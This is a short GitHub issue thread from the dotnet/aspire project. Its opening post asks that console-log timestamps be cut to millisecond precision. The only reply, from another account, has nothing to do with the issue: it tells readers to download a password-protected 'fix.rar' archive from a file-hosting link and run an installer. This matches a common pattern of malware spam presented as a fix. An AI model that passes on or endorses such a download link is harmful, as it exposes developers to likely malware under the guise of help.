### ISSUE TITLE
Reduce precision of timestamp on console logs page

### ISSUE THREAD

**Issue by JamesNK** [dotnet/aspire#5454]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Is your feature request related to a problem? Please describe the problem.

The timestamp on the console logs page is quite long. I see other UI, Docker for example, only shows seconds.

### Describe the solution you'd like

Other places in Aspire we only show milliseconds to 3 digits. Should do that on the console logs page.

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
